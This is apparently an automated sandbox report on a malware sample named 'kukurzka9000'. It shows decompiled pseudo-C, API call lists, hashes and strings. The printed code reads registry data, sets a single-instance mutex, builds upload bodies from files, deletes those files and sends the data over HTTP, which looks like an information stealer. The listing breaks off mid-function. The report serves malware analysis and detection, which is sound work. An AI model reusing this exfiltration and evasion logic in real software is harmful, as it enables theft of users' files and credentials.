Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: CombinePath$CloseFindFreeLocal
String ID:
API String ID: 2199340046-0
Opcode ID: 8d4b454fa07d57e91eda3078c457a80832fe221a6e70e63dacd382864624ccd9
Instruction ID: 3d68e71345cd2aefdee3dd56593ad5adbe6c8fe38e95c290ac396d302c259ee2
Opcode Fuzzy Hash: 8d4b454fa07d57e91eda3078c457a80832fe221a6e70e63dacd382864624ccd9
Instruction Fuzzy Hash: D2410571600214ABDB24EB55DD84FAB7378EB44300F00457AF905B32E0EB789E55CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 004055B6 Relevance: 74.0, APIs: 49, Instructions: 476
memoryregistrylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 34%

			E004055B6(intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				intOrPtr _v56;
				signed int _v60;
				char _v64;
				void* __ecx;
				void* _t117;
				void* _t124;
				void* _t131;
				void* _t138;
				void* _t147;
				void* _t156;
				void* _t162;
				void* _t167;
				void* _t181;
				void* _t182;
				void* _t194;
				void* _t195;
				void* _t209;
				void* _t210;
				void* _t211;
				void* _t212;
				void* _t213;
				void* _t214;
				void* _t226;
				void* _t228;
				void* _t229;
				void* _t230;
				char _t274;
				void* _t289;
				void* _t291;
				void* _t295;
				void* _t296;
				void* _t298;
				void* _t300;
				void* _t302;
				void* _t304;
				void* _t306;
				void* _t308;
				int _t309;
				void* _t311;
				void* _t314;
				signed int _t317;
				void* _t319;
				signed int _t321;
				void* _t323;
				signed int _t325;
				void* _t327;
				signed int _t329;
				void* _t331;
				signed int _t333;
				void* _t335;
				signed int _t337;
				void* _t339;
				signed int _t341;
				void* _t344;
				void* _t345;
				void* _t347;
				void* _t348;

				_v56 = __edx;
				_t295 =  *((intOrPtr*)( *0x40e18c))(_t230,  *0x40e250);
				if(_t295 == 0) {
					L42:
					return 0;
				}
				while(1) {
					_t296 = _t295 + 0xa;
					_t117 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t296) + _t115);
					_t226 = _t117;
					_v8 = _t226;
					_t314 =  *((intOrPtr*)( *0x40e18c))(_t296,  *0x40e1f0);
					if(_t314 == 0) {
						break;
					}
					_t317 = _t314 - _t296 >> 1;
					if(E0040A3E4(_t296,  &_v8, 0, _t317) == 0) {
						_t226 = _v8;
						break;
					}
					_t298 = _t296 + _t317 * 2 + 2;
					_t124 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t298) + _t122);
					_t226 = _t124;
					_v12 = _t226;
					_t319 =  *((intOrPtr*)( *0x40e18c))(_t298,  *0x40e20c);
					if(_t319 == 0) {
						L37:
						LocalFree(_v8);
						L29:
						break;
					}
					_t321 = _t319 - _t298 >> 1;
					if(E0040A3E4(_t298,  &_v12, 0, _t321) == 0) {
						_t226 = _v12;
						goto L37;
					}
					_t300 = _t298 + _t321 * 2 + 2;
					_t131 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t300) + _t129);
					_t226 = _t131;
					_v16 = _t226;
					_t323 =  *((intOrPtr*)( *0x40e18c))(_t300,  *0x40e20c);
					if(_t323 == 0) {
						L35:
						LocalFree(_v8);
						LocalFree(_v12);
						goto L29;
					}
					_t325 = _t323 - _t300 >> 1;
					if(E0040A3E4(_t300,  &_v16, 0, _t325) == 0) {
						_t226 = _v16;
						goto L35;
					}
					_t302 = _t300 + _t325 * 2 + 2;
					_t138 = LocalAlloc(0x40, RegOpenKeyExA(_t302, ??, ??, ??, ??) + _t136);
					_t228 = _t138;
					_v20 = _t228;
					_t327 =  *((intOrPtr*)( *0x40e18c))(_t302,  *0x40e20c);
					if(_t327 == 0) {
						L33:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_t228);
						LocalFree(_v16);
						L40:
						L41:
						goto L42;
					}
					_t329 = _t327 - _t302 >> 1;
					if(E0040A3E4(_t302,  &_v20, 0, _t329) == 0) {
						_t228 = _v20;
						goto L33;
					}
					_t304 = _t302 + _t329 * 2 + 2;
					_t147 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t304) + _t145);
					_t226 = _t147;
					_v24 = _t226;
					_t331 =  *((intOrPtr*)( *0x40e18c))(_t304,  *0x40e20c);
					if(_t331 == 0) {
						L31:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						goto L29;
					}
					_t333 = _t331 - _t304 >> 1;
					if(E0040A3E4(_t304,  &_v24, 0, _t333) == 0) {
						_t226 = _v24;
						goto L31;
					}
					_t306 = _t304 + _t333 * 2 + 2;
					_t156 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t306) + _t154);
					_t226 = _t156;
					_v32 = _t226;
					_t335 =  *((intOrPtr*)( *0x40e18c))(_t306,  *0x40e20c);
					if(_t335 == 0) {
						L28:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v20);
						LocalFree(_v24);
						goto L29;
					}
					_t337 = _t335 - _t306 >> 1;
					_t162 = E0040A3E4(_t306,  &_v32, 0, _t337);
					_t226 = _v32;
					if(_t162 == 0) {
						goto L28;
					}
					_t308 = _t306 + _t337 * 2 + 2;
					_v44 =  *_t226 & 0x0000ffff;
					_t167 = LocalAlloc(0x40,  *((intOrPtr*)( *0x40e08c))(_t308) + _t165);
					_v28 = _t167;
					_t339 =  *((intOrPtr*)( *0x40e18c))(_t308,  *0x40e20c);
					if(_t339 == 0) {
						L27:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v24);
						LocalFree(_v20);
						LocalFree(_t226);
						LocalFree(_v28);
						goto L40;
					}
					_t341 = _t339 - _t308 >> 1;
					if(E0040A3E4(_t308,  &_v28, 0, _t341) == 0) {
						goto L27;
					}
					_t229 = _t308 + (_t341 + 1) * 2;
					_v48 =  *_v28 & 0x0000ffff;
					_t309 = 0x40;
					_t181 = LocalAlloc(_t309, ??);
					_t344 = _t181;
					_v36 = _t344;
					_t182 =  *((intOrPtr*)( *0x40e18c))(_t229,  *0x40e228,  *((intOrPtr*)( *0x40e08c))(_t229) + _t179);
					if(_t182 == 0) {
						L26:
						LocalFree(_v8);
						LocalFree(_v12);
						LocalFree(_v16);
						LocalFree(_v24);
						LocalFree(_v20);
						LocalFree(_v32);
						LocalFree(_v28);
						LocalFree(_t344);
						goto L40;
					}
					if(LoadLibraryExA(0, _t182 - _t229 >> 1, ??) == 0) {
						_t344 = _v36;
						goto L26;
					}
					_v40 = _v40 & 0x00000000;
					_t194 =  *((intOrPtr*)( *0x40e044))(_t309, 0x28000);
					_t345 = _t194;
					_v52 = _t345;
					_t195 =  *((intOrPtr*)( *0x40e074))(_v24);
					_push( &_v40);
					_push(_t345);
					_t289 = 0x31;
					_push(0 | _v48 == _t289);
					_push(0 | _v44 == _t289);
					_push(_t195);
					_push(_v20);
					_push(_v16);
					_push(_v12);
					E00405FEB(_v36, _v8);
					_t348 = _t348 + 0x20;
					if(_v40 > 0) {
						_t209 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
						_t210 =  *((intOrPtr*)( *0x40e044))(_t309, 0x208);
						_t291 = 0x10;
						_t211 = E0040A05F(_t209, _t291);
						_v48 = _t211;
						_t212 =  *((intOrPtr*)( *0x40e13c))(_t210,  *0x40e210);
						_t311 = _v48;
						_t213 = E0040A503(_t212, _t311);
						_t274 =  *0x40e204; // 0x825d40
						_v60 = _v60 & 0x00000000;
						_v64 = _t274;
						_v48 = _t213;
						_t214 = E00408619( &_v48);
						_v44 = _t214;
						_t347 =  *((intOrPtr*)( *0x40e044))(0x40, 0x184);
						 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, 0, 0, 0, 0);
						if(0 != 0) {
							 *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _t311, 0xffffffff, _t347, 0, 0, 0);
							if(0 != 0) {
								E00407EDB(_v56, _t347, 0, 0, _v40, _v52, _v44,  &_v64);
								_t348 = _t348 + 0x18;
							}
						}
						LocalFree(_t347);
						LocalFree(_v44);
						LocalFree(_v48);
						LocalFree(_t311);
						_t345 = _v52;
					}
					LocalFree(_t345);
					LocalFree(_v8);
					LocalFree(_v12);
					LocalFree(_v16);
					LocalFree(_v20);
					LocalFree(_v24);
					LocalFree(_v32);
					LocalFree(_v28);
					LocalFree(_v36);
					_t295 =  *((intOrPtr*)( *0x40e18c))(_t229,  *0x40e250);
					if(_t295 != 0) {
						continue;
					} else {
						goto L41;
					}
				}
				LocalFree(_t226);
				goto L40;
			}

0x004055c8
0x004055ce
0x004055d2
0x00405b56
0x00405b5a
0x00405b5a
0x004055da
0x004055df
0x004055f0
0x004055fe
0x00405601
0x00405606
0x0040560a
0x00000000
0x00000000
0x00405615
0x00405625
0x00405b4a
0x00000000
0x00405b4a
0x00405639
0x00405644
0x00405652
0x00405655
0x0040565a
0x0040565e
0x00405b45
0x00405ae5
0x00405ae5
0x00000000
0x00405ae5
0x00405669
0x00405679
0x00405b42
0x00000000
0x00405b42
0x0040568d
0x00405698
0x004056a6
0x004056a9
0x004056ae
0x004056b2
0x00405b34
0x00405b37
0x00405ae5
0x00000000
0x00405ae5
0x004056bd
0x004056cd
0x00405b31
0x00000000
0x00405b31
0x004056e1
0x004056ec
0x004056fa
0x004056fd
0x00405702
0x00405706
0x00405b13
0x00405b16
0x00405b1f
0x00405b26
0x00405b4e
0x00405b4e
0x00405b54
0x00000000
0x00405b55
0x00405711
0x00405721
0x00405b10
0x00000000
0x00405b10
0x00405735
0x00405740
0x0040574e
0x00405751
0x00405756
0x0040575a
0x00405af0
0x00405af3
0x00405afc
0x00405b05
0x00405ae5
0x00000000
0x00405ae5
0x00405765
0x00405775
0x00405aed
0x00000000
0x00405aed
0x00405789
0x00405794
0x004057a2
0x004057a5
0x004057aa
0x004057ae
0x00405abe
0x00405ac1
0x00405aca
0x00405ad3
0x00405adc
0x00405ae5
0x00000000
0x00405ae5
0x004057b9
0x004057c0
0x004057c5
0x004057cc
0x00000000
0x00000000
0x004057de
0x004057e1
0x004057f1
0x00405800
0x00405805
0x00405809
0x00405a82
0x00405a85
0x00405a8e
0x00405a97
0x00405aa0
0x00405aa9
0x00405ab0
0x00405b4e
0x00000000
0x00405b4e
0x00405814
0x00405824
0x00000000
0x00000000
0x00405831
0x0040583a
0x0040584a
0x0040584c
0x0040585a
0x0040585d
0x00405860
0x00405864
0x00405a3d
0x00405a40
0x00405a49
0x00405a52
0x00405a5b
0x00405a64
0x00405a6d
0x00405a76
0x00405b4e
0x00000000
0x00405b4e
0x0040587f
0x00405a3a
0x00000000
0x00405a3a
0x0040588a
0x00405894
0x0040589f
0x004058a1
0x004058a4
0x004058a9
0x004058aa
0x004058ad
0x004058b7
0x004058c4
0x004058c8
0x004058c9
0x004058cc
0x004058cf
0x004058d2
0x004058d7
0x004058de
0x004058ef
0x004058ff
0x00405903
0x00405908
0x0040591a
0x0040591d
0x0040591f
0x00405926
0x0040592b
0x00405931
0x00405935
0x0040593b
0x0040593e
0x00405950
0x0040595b
0x0040596c
0x00405970
0x00405987
0x0040598b
0x004059a3
0x004059a8
0x004059a8
0x0040598b
0x004059ac
0x004059b5
0x004059be
0x004059c5
0x004059cb
0x004059cb
0x004059cf
0x004059d8
0x004059e1
0x004059ea
0x004059f3
0x004059fc
0x00405a05
0x00405a0e
0x00405a17
0x00405a2b
0x00405a2f
0x00000000
0x00405a35
0x00000000
0x00405a35
0x00405a2f
0x00405b4e
0x00000000

APIs

LocalAlloc.KERNEL32(00000040,00000000), ref: 004055F0
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B4E

Part of subcall function 0040A3E4: LocalAlloc.KERNEL32(00000040,00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A40C
Part of subcall function 0040A3E4: LocalFree.KERNEL32(00000000,?,0040870A,00000000,00000000,?,?,?,?,?,?,004079E3), ref: 0040A449

LocalAlloc.KERNEL32(00000040,00000000), ref: 00405644
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405698
RegOpenKeyExA.KERNELBASE(-00000010), ref: 004056E5
LocalAlloc.KERNEL32(00000040,00000000), ref: 004056EC
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405740
LocalAlloc.KERNEL32(00000040,00000000), ref: 00405794
LocalAlloc.KERNEL32(00000040,00000000), ref: 004057F1
LocalAlloc.KERNEL32(00000040,00000000), ref: 0040584C
LoadLibraryExA.KERNELBASE ref: 00405876

Part of subcall function 00405FEB: lstrlenW.KERNEL32(008260C0,?,?,?,?,?,?,?,?,?,?,?,004058D7,?,?,?), ref: 00406137

LocalFree.KERNEL32(00000000), ref: 004059AC
LocalFree.KERNEL32(?), ref: 004059B5
LocalFree.KERNEL32(?), ref: 004059BE
LocalFree.KERNEL32(?), ref: 004059C5
LocalFree.KERNEL32(00000000), ref: 004059CF
LocalFree.KERNEL32(00407BAF), ref: 004059D8
LocalFree.KERNEL32(?), ref: 004059E1
LocalFree.KERNEL32(?), ref: 004059EA
LocalFree.KERNEL32(?), ref: 004059F3
LocalFree.KERNEL32(?), ref: 004059FC
LocalFree.KERNEL32(?), ref: 00405A05
LocalFree.KERNEL32(?), ref: 00405A0E
LocalFree.KERNEL32(?), ref: 00405A17

Part of subcall function 0040A503: lstrlenW.KERNEL32(?,00000000,?,00000000,00000000,?,00408633), ref: 0040A516
Part of subcall function 0040A503: lstrlenW.KERNEL32(?,?,00000000,?,00000000,00000000,?,00408633), ref: 0040A51D
Part of subcall function 0040A503: GlobalFree.KERNEL32(?), ref: 0040A550

LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A40
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A49
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A52
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A5B
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A64
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A6D
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A76
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A85
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A8E
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405A97
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA0
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AA9
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AB0
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AC1
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ACA
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AD3
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405ADC
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AE5
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AF3
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405AFC
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B05
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B16
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B1F
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B26
LocalFree.KERNEL32(00407BAF,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407BAF), ref: 00405B37

Memory Dump Source

Source File: 00000012.00000002.394907312.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000012.00000002.394937894.0000000000410000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_400000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: Local$Free$Alloc$lstrlen$GlobalLibraryLoadOpen
String ID:
API String ID: 3736288983-0
Opcode ID: acb05a7f8a70a2da554c802db9e5f0e9240b428b10ae7605c4d463cf284dd9f3
Instruction ID: f35946c0f576b0545b5d2f7ca60a1d17271964e093f6211ee75f8335e655f3b5
Opcode Fuzzy Hash: acb05a7f8a70a2da554c802db9e5f0e9240b428b10ae7605c4d463cf284dd9f3
Instruction Fuzzy Hash: E1F1C372900225EFDB149BA6DE48EAEBB75EB48310F044535F905B32A0DB746D21CFA9

Uniqueness

Uniqueness Score: -1.00%

Function 022B6CE3 Relevance: 65.1, APIs: 31, Strings: 6, Instructions: 395
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 022B057F: LoadLibraryW.KERNEL32(0040C040), ref: 022B058A
Part of subcall function 022B057F: LoadLibraryW.KERNEL32(0040C114), ref: 022B061E

CoInitialize.OLE32(00000000), ref: 022B6CF7

Part of subcall function 022B9A36: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,?,00000000,00000000), ref: 022B9A65

CreateMutexW.KERNEL32(00000000,00000000,iqroq5112542785672901323), ref: 022B6D62
ExitProcess.KERNEL32 ref: 022B6D6C
LocalFree.KERNEL32(00000000), ref: 022B6E71
LocalFree.KERNEL32(00000000), ref: 022B6E78
LocalFree.KERNEL32(00000000), ref: 022B6E7F
LocalFree.KERNEL32(00000000), ref: 022B6EEA
LocalFree.KERNEL32(00000000), ref: 022B6EF5
LocalFree.KERNEL32(00000000), ref: 022B6F14
LocalFree.KERNEL32(?), ref: 022B6F1D
LocalFree.KERNEL32(?), ref: 022B6F26
ExitProcess.KERNEL32 ref: 022B6F75
ExitProcess.KERNEL32 ref: 022B6FAB

Strings

iqroq5112542785672901323, xrefs: 022B6D4D, 022B6D52, 022B6D5F
, xrefs: 022B6D97
, xrefs: 022B6D8B
, xrefs: 022B6DA3
, xrefs: 022B6DB6
afb5c633c4650f69312baef49db9dfa4, xrefs: 022B6CFD

Memory Dump Source

Source File: 00000012.00000002.396184896.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022B0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_22b0000_kukurzka9000.jbxd

Yara matches

Similarity

API ID: FreeLocal$ExitProcess$LibraryLoad$ByteCharCreateInitializeMultiMutexWide
String ID: $ $ $ $afb5c633c4650f69312baef49db9dfa4$iqroq5112542785672901323
API String ID: 1864685469-1031988469
Opcode ID: c558d2bf8f2b5ab25cdbf621f3a43ffca48a0fa9f05b2738d3e56535cb160897
Instruction ID: 39e255d07d38e6ba621141f63eeaf90e2f81c860d555478b3955b9ea44927156
Opcode Fuzzy Hash: c558d2bf8f2b5ab25cdbf621f3a43ffca48a0fa9f05b2738d3e56535cb160897
Instruction Fuzzy Hash: 64D1A971A102149BDB05ABF2DD58ABE77B6AF48340F004838E605B73A4DF789D518F69

Uniqueness

Uniqueness Score: -1.00%

Function 00407EDB Relevance: 49.5, APIs: 26, Strings: 2, Instructions: 477
networkfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E00407EDB(short* __ecx, void* __edx, signed int _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20, intOrPtr _a24) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				signed int _v32;
				void* _v36;
				char _v40;
				void _v44;
				void _v48;
				void* _v52;
				void* _t109;
				void* _t112;
				signed int _t113;
				signed int _t115;
				void* _t119;
				void* _t121;
				void* _t123;
				void* _t124;
				void* _t128;
				void* _t129;
				void* _t131;
				void* _t132;
				char _t148;
				void* _t164;
				void* _t166;
				long _t168;
				long _t169;
				signed int _t174;
				void* _t178;
				void* _t179;
				void* _t180;
				void* _t182;
				void* _t183;
				void* _t186;
				void* _t187;
				void* _t188;
				void* _t189;
				void* _t190;
				void* _t191;
				void* _t209;
				void* _t211;
				void* _t212;
				void* _t215;
				void* _t216;
				void* _t217;
				void* _t218;
				void* _t220;
				void* _t223;
				void* _t224;
				intOrPtr _t226;
				intOrPtr* _t227;
				signed int _t229;
				void* _t282;
				intOrPtr _t285;
				intOrPtr _t286;
				intOrPtr _t288;
				intOrPtr _t293;
				intOrPtr _t294;
				intOrPtr _t296;
				intOrPtr _t297;
				intOrPtr _t300;
				intOrPtr _t301;
				intOrPtr _t302;
				intOrPtr _t303;
				intOrPtr _t306;
				intOrPtr _t308;
				intOrPtr _t309;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr _t314;
				intOrPtr _t315;
				intOrPtr _t317;
				void* _t318;
				signed int _t319;
				void* _t320;
				void* _t321;
				void* _t323;
				void* _t326;
				signed short* _t328;
				void* _t329;
				void* _t331;
				void* _t333;
				void** _t338;
				void* _t339;

				_v20 = __edx;
				_t327 = __ecx;
				_t224 =  *((intOrPtr*)( *0x40e044))(0x40, 0xc350);
				_v24 = _t224;
				_t318 =  *((intOrPtr*)( *0x40e044))(0x40, 0x208);
				_v28 = _t318;
				if( *__ecx != 0x68) {
					L14:
					return 0;
				}
				_t109 = 0x74;
				if( *((intOrPtr*)(__ecx + 2)) != _t109 ||  *((intOrPtr*)(__ecx + 4)) != _t109 ||  *((short*)(__ecx + 6)) != 0x70) {
					goto L14;
				} else {
					_t7 = _t327 + 8; // 0x4589d0ff
					_v32 =  *_t7 & 0x0000ffff;
					_t112 =  *((intOrPtr*)( *0x40e18c))(__ecx,  *0x40e3ec);
					_v16 = 0x2f;
					_t282 = 0;
					_t10 = _t112 + 6; // 0x6
					_t328 = _t10;
					_t113 =  *_t328 & 0x0000ffff;
					_t229 = _t113;
					if(_t113 == _v16) {
						L7:
						_t115 =  *((intOrPtr*)( *0x40e08c))(_t318);
						_t319 = _a4;
						_v52 =  &(_t328[_t115]);
						_t119 =  *((intOrPtr*)( *0x40e044))(0x40, _t319 << 0x15);
						_v8 = _t119;
						if(_t319 <= 0) {
							L11:
							_t121 =  *((intOrPtr*)( *0x40e0e4))(0xfde9, 0, _v8, 0xffffffff, 0, 0, 0, 0);
							_v16 = _t121;
							_t329 =  *((intOrPtr*)( *0x40e044))(0x40, _t319 << 0x14);
							_t123 =  *((intOrPtr*)( *0x40e044))(0x40, _t319 + _a12 << 0x14);
							_v12 = _t123;
							_t320 = _t123;
							_t124 = _v16;
							if(_t124 == 0) {
								L19:
								LocalFree(_v8);
								LocalFree(_t329);
								if(_a12 <= 0) {
									L32:
									_t128 =  *((intOrPtr*)( *0x40e044))(0x40, 0x100);
									_t285 =  *0x40e3dc; // 0x819578
									_t129 = E0040A55D(_t128, _t285);
									_t286 =  *0x40e43c; // 0x819638
									_t131 = E0040A55D(E0040A55D(_t129, _t286), _v20);
									_t288 =  *0x40e43c; // 0x819638
									_t132 = E0040A55D(_t131, _t288);
									_v20 = _t132;
									_push( *((intOrPtr*)( *0x40e198))(_t132) + 1);
									_push(_v20);
									_push(_t320);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _t320 +  *((intOrPtr*)( *0x40e198))(_v20);
									}
									LocalFree(_v20);
									_v44 = 0x927c0;
									_v48 = 0x927c0;
									_t331 =  *((intOrPtr*)( *0x40e124))(L"rqwrwqrqwrqw", 0, 0, 0, 0);
									_v36 = _t331;
									InternetSetOptionW(_t331, 6,  &_v44, 4);
									InternetSetOptionW(_t331, 5,  &_v48, 4);
									if(_t331 == 0) {
										L45:
										_t333 = MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(0) + 1, _t224, 0);
										_v52 = _t333;
										_t148 = _t333 + _t333;
										_v40 = _t148;
										_t321 =  *((intOrPtr*)( *0x40e044))(0x40, _t148);
										if(_t333 != 0) {
											MultiByteToWideChar(0xfde9, 0, _t224,  *((intOrPtr*)( *0x40e198))(_v52) + 1, _t224, _t321);
											 *((short*)(_v40 + _t321 - 2)) = 0;
										}
										if(_t321 != 0) {
											LocalFree(_t321);
										}
										LocalFree(_v28);
										LocalFree(_t224);
										LocalFree(_v12);
										return 1;
									} else {
										_t162 =  ==  ? 0x1bb : 0;
										_t163 = ( ==  ? 0x1bb : 0) & 0x0000ffff;
										_t164 =  *((intOrPtr*)( *0x40e180))(_t331, _v28, ( ==  ? 0x1bb : 0) & 0x0000ffff, 0x73, 0x50, 0, 0, 3, 0, 1);
										_v20 = _t164;
										if(_t164 == 0) {
											L44:
											InternetCloseHandle(_t331);
											goto L45;
										}
										_v40 = 0xc00000;
										_t248 =  ==  ? _v40 : 0x400000;
										_t166 =  *((intOrPtr*)( *0x40e0b8))(_t164,  *0x40e25c, _v52, 0, 0, _a24,  ==  ? _v40 : 0x400000, 0x73, 1);
										_t224 = _v24;
										_v52 = _t166;
										if(_t166 == 0) {
											L43:
											InternetCloseHandle(_v20);
											goto L44;
										}
										_t168 = _v12;
										_t169 =  *((intOrPtr*)( *0x40e08c))(_t320 - _t168);
										_t323 = _v52;
										if(HttpSendRequestW(_t323, _a20, _t169, _a20, _t168) == 0) {
											L42:
											InternetCloseHandle(_t323);
											_t331 = _v36;
											goto L43;
										}
										while(1) {
											_push( &_v32);
											_push(0xc350);
											_push(_t224);
											_push(_t323);
											if( *((intOrPtr*)( *0x40e0fc))() == 0) {
												goto L42;
											}
											_t174 = _v32;
											if(_t174 == 0) {
												goto L42;
											}
											 *((char*)(_t224 + _t174)) = 0;
										}
										goto L42;
									}
								}
								_t226 = _a12;
								_t338 = _a16 + 4;
								do {
									_t178 =  *((intOrPtr*)( *0x40e14c))( *_t338, 0);
									_v36 = _t178;
									_t49 = _t178 + 0x400; // 0x400
									_t179 =  *((intOrPtr*)( *0x40e044))(0x40, _t49);
									_t293 =  *0x40e3dc; // 0x819578
									_t180 = E0040A55D(_t179, _t293);
									_t294 =  *0x40e43c; // 0x819638
									_t182 = E0040A55D(E0040A55D(_t180, _t294), _v20);
									_t296 =  *0x40e3dc; // 0x819578
									_t183 = E0040A55D(_t182, _t296);
									_t297 =  *0x40e444; // 0x81a928
									_t186 = E0040A55D(E0040A55D(E0040A55D(_t183, _t297),  *(_t338 - 4)), "\"");
									_t300 =  *0x40e3dc; // 0x819578
									_t187 = E0040A55D(_t186, _t300);
									_t301 =  *0x40e3f0; // 0x8153c0
									_t188 = E0040A55D(_t187, _t301);
									_t302 =  *0x40e3dc; // 0x819578
									_t189 = E0040A55D(_t188, _t302);
									_t303 =  *0x40e3dc; // 0x819578
									_t190 = E0040A55D(_t189, _t303);
									_v16 = _t190;
									_t191 =  *((intOrPtr*)( *0x40e198))(_t190);
									_v8 = _t191;
									_t54 = _t191 + 1; // 0x1
									_push(_v16);
									_push(_t320);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _t320 + _v8;
										if( *_t338 != 0) {
											_push(0);
											_push( &_v40);
											_push(_v36);
											_push(_t320);
											_push( *_t338);
											if( *((intOrPtr*)( *0x40e088))() != 0) {
												_t320 = _t320 + _v40;
											}
											CloseHandle( *_t338);
										}
									}
									if( *(_t338 - 4) != 0) {
										LocalFree( *(_t338 - 4));
									}
									if(_t338[1] != 0) {
										DeleteFileW(_t338[1]);
										LocalFree(_t338[1]);
									}
									LocalFree(_v16);
									_t338 =  &(_t338[4]);
									_t226 = _t226 - 1;
								} while (_t226 != 0);
								_t224 = _v24;
								goto L32;
							}
							_push(0);
							_push(0);
							_push(_t124);
							_push(_t329);
							_push(0xffffffff);
							_push(_v8);
							_push(0);
							_push(0xfde9);
							if( *((intOrPtr*)( *0x40e0e4))() != 0) {
								_push(_t329);
								if( *((intOrPtr*)( *0x40e198))() > 0) {
									_push(_v16);
									_push(_t329);
									_push(_v12);
									if( *((intOrPtr*)( *0x40e004))() != 0) {
										_t320 = _v16 - 1 + _v12;
									}
								}
								goto L19;
							}
							LocalFree(_v8);
							LocalFree(_t224);
							LocalFree(_t329);
							LocalFree(_v28);
							goto L14;
						} else {
							_t227 = _a8;
							_v16 = _t319;
							_t326 = _t119;
							do {
								_t209 = E0040A4C2(_v20);
								_t306 =  *0x40e3f8; // 0x825ca0
								_t339 = _t209;
								_t211 = E0040A503(E0040A503(_t326, _t306), _t339);
								_t308 =  *0x40e350; // 0x825c60
								_t212 = E0040A503(_t211, _t308);
